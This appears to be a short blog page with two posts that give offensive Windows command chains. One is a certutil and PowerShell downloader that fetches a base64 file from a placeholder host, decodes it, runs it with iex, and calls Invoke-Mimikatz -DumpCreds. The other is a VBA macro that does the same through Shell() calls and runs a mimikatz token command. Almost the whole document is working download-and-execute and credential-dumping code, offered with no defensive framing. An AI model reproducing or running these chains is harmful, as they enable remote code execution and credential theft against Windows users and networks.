Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

sample downloader that executed mimikatz


certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string);

Invoke-Mimikatz -DumpCreds


Posted by at 3 comments:
Labels: , , ,

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")



Posted by at 2 comments:
Labels: , , , ,
Subscribe to: Posts (Atom)